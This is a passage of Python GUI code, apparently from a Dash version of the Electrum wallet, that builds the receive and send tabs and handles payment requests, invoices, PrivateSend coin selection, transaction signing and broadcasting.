'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The Dash address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a Dash address any number of times but it is not good for your privacy.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("dashcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice())
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.get_address()
title = _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
recv_addr_e = self.receive_address_e
if is_address(addr) and self.wallet.is_used(addr):
recv_addr_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
recv_addr_e.setToolTip(_('This address has already been used.'
' For better privacy, do not reuse it'
' for new payments.'))
elif addr in self.wallet.db.get_ps_reserved():
recv_addr_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
recv_addr_e.setToolTip(_('This address has been reserved for'
' PrivateSend use. For better privacy,'
' do not use it for new payments.'))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
# PrivateSend options
msg = (_('Send transaction using PrivateSend anonymized coins') +
'\n\n' +
_('Amount available for current send options'))
send_options_label = HelpLabel(_('Send options') + ', ' +
_('Available amount'), msg)
send_options_label.setWordWrap(True)
send_options_label.setVisible(True)
grid.addWidget(send_options_label, 3, 0)
self.ps_cb = QCheckBox(_('PrivateSend'))
self.ps_cb.stateChanged.connect(self.on_ps_cb)
self.ps_cb.setVisible(True)
grid.addWidget(self.ps_cb, 3, 1)
self.av_amnt = BTCAmountEdit(self.get_decimal_point)
self.av_amnt.setEnabled(False)
self.av_amnt.setVisible(True)
grid.addWidget(self.av_amnt, 3, 3)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.extra_payload = ExtraPayloadWidget(self)
self.extra_payload.hide()
msg = _('Extra payload.') + '\n\n'\
+ _('Dash DIP2 Special Transaction extra payload.')
self.extra_payload_label = HelpLabel(_('Extra payload'), msg)
self.extra_payload_label.hide()
grid.addWidget(self.extra_payload_label, 9, 0)
grid.addWidget(self.extra_payload, 9, 1, 1, -1)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
psman = self.wallet.psman
is_ps = self.ps_cb.isChecked()
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
tx_type, extra_payload = self.extra_payload.get_extra_data()
def make_tx(fee_est):
tx = self.wallet.make_unsigned_transaction(
coins=self.get_coins(min_rounds=min_rounds),
outputs=outputs,
fee=fee_est,
is_sweep=False,
min_rounds=min_rounds, no_ps_data=no_ps_data,
tx_type=tx_type, extra_payload=extra_payload)
if tx.tx_type:
tx.extra_payload.check_after_tx_prepared(tx)
return tx
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except (MultipleSpendMaxTxOutputs, DashTxError) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Dash Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def read_invoice_ext(self):
if not self.pending_invoice:
return
w = self.wallet
_id = self.pending_invoice.id
is_ps = self.ps_cb.isChecked()
tx_type, extra_payload = self.extra_payload.get_extra_data()
extra_payload = '' if not extra_payload else extra_payload.to_hex_str()
invoice_ext = w.create_invoice_ext(_id, is_ps=is_ps, tx_type=tx_type,
extra_payload=extra_payload)
return invoice_ext
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
self.pending_invoice_ext = self.read_invoice_ext()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
_id = self.pending_invoice.id
self.wallet.save_invoice_ext(_id, self.pending_invoice_ext)
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
self.pending_invoice_ext = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
self.pending_invoice_ext = self.read_invoice_ext()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice, self.pending_invoice_ext)
def pay_multiple_invoices(self, invoices):
outputs = []
invoices_ext = []
for invoice in invoices:
outputs += invoice.outputs
invoices_ext.append(self.wallet.get_invoice_ext(invoice.id))
if any([i.is_ps for i in invoices_ext]):
raise Exception('Can not do batch payment with'
' PrivateSend options on invoices')
if any([(i.tx_type or i.extra_payload) for i in invoices_ext]):
raise Exception('Can not do batch payment with DIP2'
' tx type/extra payload on invoices')
self.pay_onchain_dialog(self.get_coins(min_rounds=None), outputs,
is_ps=False, tx_type=0, extra_payload=b'')
def do_pay_invoice(self, invoice: 'Invoice',
invoice_ext: 'InvoiceExt' = None):
if invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
psman = self.wallet.psman
if invoice_ext is None:
_id = invoice.id
invoice_ext = self.wallet.get_invoice_ext(_id)
is_ps = invoice_ext.is_ps
min_rounds = psman.mix_rounds if is_ps else None
tx_type = invoice_ext.tx_type
extra_payload = invoice_ext.extra_payload
extra_payload = ProTxBase.from_hex_str(tx_type, extra_payload)
self.pay_onchain_dialog(self.get_coins(min_rounds=min_rounds),
invoice.outputs, is_ps=is_ps,
tx_type=tx_type,
extra_payload=extra_payload)
else:
raise Exception('unknown invoice type')
def hide_extra_payload(self):
self.extra_payload.hide()
self.extra_payload_label.hide()
def show_extra_payload(self):
self.extra_payload.show()
self.extra_payload_label.show()
def on_ps_cb(self, is_ps):
if self.max_button.isChecked():
self.spend_max()
self.update_available_amount()
if is_ps:
w = self.wallet
psman = w.psman
if not psman.enabled and psman.is_hw_ks:
self.show_warning(_('It is not reccomended to send PrivateSend'
' transaction without PS Keystore,'
' as there is no means to verify'
' input coins'))
denoms_by_vals = psman.calc_denoms_by_values()
if denoms_by_vals:
if not psman.check_enough_sm_denoms(denoms_by_vals):
psman.postpone_notification('ps-not-enough-sm-denoms',
w, denoms_by_vals)
def reset_privatesend(self):
coins = self.get_manually_selected_coins()
if coins is not None:
self.set_ps_cb_from_coins(coins)
else:
self.ps_cb.setChecked(False)
self.update_available_amount()
def update_available_amount(self, nonlocal_only=False):
if self.tabs.currentIndex() != self.tabs.indexOf(self.send_tab):
return
wallet = self.wallet
psman = wallet.psman
is_ps = self.ps_cb.isChecked()
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
tx_type, extra_payload = self.extra_payload.get_extra_data()
inputs = self.get_coins(nonlocal_only=nonlocal_only,
min_rounds=min_rounds)
if inputs:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
try:
tx = wallet.make_unsigned_transaction(coins=inputs,
outputs=outputs,
no_ps_data=no_ps_data,
min_rounds=min_rounds,
tx_type=tx_type,
extra_payload=extra_payload)
amount = tx.output_value()
extra_fee = run_hook('get_tx_extra_fee', wallet, tx)
if extra_fee:
amount -= extra_fee[1]
except Exception:
amount = 0
else:
amount = 0
self.av_amnt.setAmount(amount)
def set_ps_cb_from_coins(self, coins):
is_ps = self.ps_cb.isChecked()
use_regular_coins = False
use_ps_coins = False
min_ps_rounds = 1e9
if not coins:
if is_ps:
self.ps_cb.setChecked(False)
self.update_available_amount()
if self.max_button.isChecked():
self.spend_max()
return
for item in list(coins):
ps = item.ps_rounds
if ps is None:
use_regular_coins = True
else:
use_ps_coins = True
min_ps_rounds = min(ps, min_ps_rounds)
if (use_ps_coins and not use_regular_coins
and min_ps_rounds >= self.wallet.psman.mix_rounds):
if not is_ps:
self.ps_cb.setChecked(True)
else:
if is_ps:
self.ps_cb.setChecked(False)
self.update_available_amount()
if self.max_button.isChecked():
self.spend_max()
def get_coins(self, *, nonlocal_only=False,
min_rounds=None) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
include_ps = (min_rounds is None)
psman = self.wallet.psman
main_ks = psman.ps_keystore and psman.is_hw_ks
no_ps_data = psman.is_hw_ks and not psman.enabled
return self.wallet.get_spendable_coins(None,
nonlocal_only=nonlocal_only,
include_ps=include_ps,
min_rounds=min_rounds,
no_ps_data=no_ps_data,
main_ks=main_ks)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None, is_ps=False,
tx_type=0, extra_payload=b'') -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
psman = self.wallet.psman
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
def make_tx(fee_est):
tx = self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=False,
min_rounds=min_rounds, no_ps_data=no_ps_data,
tx_type=tx_type, extra_payload=extra_payload)
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
return tx
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx,
output_value=output_value,
is_sweep=is_sweep, is_ps_tx=is_ps)
conf_dlg.bg_update(
lambda x: self._conf_dlg_after_bg_update(conf_dlg,
external_keypairs))
def _check_hw_wallets_txin_cnt(self, conf_dlg):
keystore = self.wallet.db.get('keystore')
ks_type = keystore.get('type', 'unknown') if keystore else 'unknown'
hw_type = keystore.get('hw_type', 'unknown') if keystore else 'unknown'
if not ks_type == 'hardware' or not hw_type == 'ledger':
return True
ks_utxo_cnt = len([c for c in self.wallet.get_utxos()
if not c.is_ps_ks])
hw_txin_cnt = len([c for c in conf_dlg.tx.inputs()
if not c.is_ps_ks])
need_warn = False
if ks_utxo_cnt <= 100:
if hw_txin_cnt > 10:
need_warn = True
elif ks_utxo_cnt <= 200:
if hw_txin_cnt > 5:
need_warn = True
elif ks_utxo_cnt <= 300:
if hw_txin_cnt > 3:
need_warn = True
elif hw_txin_cnt > 1:
need_warn = True
if not need_warn:
return True
cb = QCheckBox(_("Don't show this again."))
def on_cb(x):
self.config.set_key('hw_no_lags_warn', True, True)
cb.stateChanged.connect(on_cb)
msg = '\n'.join([
_('Warning') + ':',
_('You have a big count of UTXOs on your HW device.'),
_('Total count of HW UTXOs is: {}.').format(ks_utxo_cnt),
_('Transaction inputs count from HW is: {}.').format(hw_txin_cnt),
_('You can encounter a big lags on HW device reaction.'),
'',
_('If this happens then try to spend coins partially,'
' by enabling "Coins" tab from "View" main menu,'
' and selecting coins to spend.'),
'',
_('Another thing to try is temporarily disable timeouts'
' on device. (Security -> [PIN lock, Screen saver])'),
'',
_('Do you want to continue with this number of inputs?')
])
return self.question(msg, checkbox=cb)
def _conf_dlg_after_bg_update(self, conf_dlg, external_keypairs):
conf_dlg.update()
hw_no_lags_warn = self.config.get('hw_no_lags_warn', False)
if not hw_no_lags_warn:
if not self._check_hw_wallets_txin_cnt(conf_dlg):
return
if conf_dlg.not_enough_funds:
self._on_conf_dlg_not_enough_funds(conf_dlg, external_keypairs)
else:
self._conf_dlg_or_preview_dlg(conf_dlg, external_keypairs)
def _on_conf_dlg_not_enough_funds(self, conf_dlg, external_keypairs):
def enough_funds_cb(can_continue):
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if can_continue:
self._conf_dlg_or_preview_dlg(conf_dlg, external_keypairs)
else:
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
conf_dlg.bg_check_have_enough_funds_assuming_zero_fees(enough_funds_cb)
def _conf_dlg_or_preview_dlg(self, conf_dlg, external_keypairs):
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=conf_dlg.make_tx,
external_keypairs=external_keypairs,
output_value=conf_dlg.output_value,
is_ps_tx=conf_dlg.is_ps_tx)
preview_dlg.bg_update(lambda x: preview_dlg.update_and_show())
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
if is_send:
pr = self.payment_request
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx, pr)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=conf_dlg.make_tx,
external_keypairs=external_keypairs,
output_value=conf_dlg.output_value,
is_ps_tx=conf_dlg.is_ps_tx)
preview_dlg.bg_update(lambda x: preview_dlg.update_and_show())
def broadcast_or_show(self, tx: Transaction,
pr: Optional[paymentrequest.PaymentRequest]):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx, pr)
@protected
@ps_ks_protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def create_small_denoms(self, denoms_by_vals, parent):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
if not coins:
msg = psman.create_sm_denoms_data(no_denoms_txt=True)
parent.show_error(msg)
self.create_new_denoms(coins[0:1], parent)
def confirm_wfl_transactions(self, info, parent):
q = _('Do you want to create transactions?\n\n{}').format(info)
return parent.question(q)
def create_new_denoms(self, coins, parent):
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
if self.confirm_wfl_transactions(info, parent):
res = self.create_new_denoms_wfl_from_gui(coins, mwin=self,
parent=parent)
if res:
wfl, err = res
if err:
parent.show_error(err)
else:
parent.show_message(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
@protected_with_parent
def create_new_denoms_wfl_from_gui(self, coins, parent, password):
psman = self.wallet.psman
return psman.create_new_denoms_wfl_from_gui(coins, password)
def create_new_collateral(self, coins, parent):
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
if self.confirm_wfl_transactions(info, parent):
res = self.create_new_collateral_wfl_from_gui(coins, mwin=self,
parent=parent)
if res:
wfl, err = res
if err:
parent.show_error(err)
else:
parent.show_message(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
@protected_with_parent
def create_new_collateral_wfl_from_gui(self, coins, parent, password):
psman = self.wallet.psman
return psman.create_new_collateral_wfl_from_gui(coins, password)
@protected_with_parent
def send_funds_to_main_ks(self, parent, password):
psman = self.wallet.psman
try:
tx_list = psman.prepare_funds_from_ps_keystore(password)
for tx in tx_list:
show_transaction(tx, parent=self)
except Exception as e:
self.show_error(f'{str(e)}')
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction,
pr: Optional[paymentrequest.PaymentRequest]):
need_broadcast = True if not pr or pr.need_broadcast_tx else False
save_bef_send = self.config.get('save_tx_before_send', False)
err_msg_info = ''
if need_broadcast and save_bef_send:
self.wallet.add_transaction(tx)
self.need_update.set()
err_msg_info = '\n\n' + _('Transaction is saved to local history')
def broadcast_thread():
# non-GUI thread
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
err_msg = e.get_message_for_gui()
